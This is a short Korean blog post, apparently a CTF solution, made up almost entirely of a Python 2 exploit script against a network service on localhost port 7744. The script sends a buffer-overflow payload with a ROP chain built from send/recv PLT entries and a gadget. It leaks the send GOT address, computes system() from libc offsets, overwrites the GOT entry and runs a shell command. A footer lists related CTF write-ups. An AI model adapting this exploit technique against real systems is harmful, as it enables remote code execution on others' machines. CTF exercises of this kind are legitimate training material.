ubuntu 13.10에서 재현
- from socket import *
- from struct import *
- import time
- s = socket(AF_INET,SOCK_STREAM)
- s.connect(('localhost', 7744))
- leaveret = 0x8048a68
- recv_plt = 0x8048770
- send_plt = 0x8048790
- bss = 0x804b080
- fake_ebp = bss+0x50
- send_got = 0x804b070
- ppppr = 0x804906c
- cmd = "id>&4\x00"
- payload = "1;"+"\x00"*(0x66c + 4 - 2)
- payload += pack('<L', send_plt)
- payload += pack('<L', ppppr)
- payload += pack('<L', 4)
- payload += pack('<L', send_got)
- payload += pack('<L', 4)
- payload += pack('<L', 0)
- payload += pack('<L', recv_plt)
- payload += pack('<L', ppppr)
- payload += pack('<L', 4)
- payload += pack('<L', send_got)
- payload += pack('<L', 4)
- payload += pack('<L', 0)
- payload += pack('<L', recv_plt)
- payload += pack('<L', ppppr)
- payload += pack('<L', 4)
- payload += pack('<L', bss)
- payload += pack('<L', len(cmd))
- payload += pack('<L', 0)
- payload += pack('<L', send_plt)
- payload += "AAAA"
- payload += pack('<L', bss)
- time.sleep(0.5)
- print s.recv(1024)
- s.send("4\n")
- time.sleep(0.5)
- print s.recv(1024)
- raw_input('go?')
- s.send(";"*0x38 + pack('<L',len(payload)))
- time.sleep(1)
- print s.recv(1024)
- s.send(payload)
- time.sleep(1)
- #print s.recv(5)
- #time.sleep(1)
- send_addr = unpack('<L',s.recv(4))[0]
- system_addr = send_addr - 0xf3940 + 0x41260
- print "System: "+hex(system_addr)
- s.send(pack('<L',system_addr))
- s.send(cmd)
- time.sleep(0.1)
- print s.recv(1024)
- s.close()
'Computer Security > CTF' 카테고리의 다른 글
[RuCTF 2014 quals] Reversing 500 (0) | 2014.03.11 |
---|---|
[Codegate 2014 quals] Web 500 write up (0) | 2014.02.24 |
[Secuinside 2013] angry danbi exploit (3) | 2013.11.27 |
Whitehat Contest 개인전 예선 보고서 (2) | 2013.09.12 |
[DIMVA 2013] pwn 200 exploit (0) | 2013.07.23 |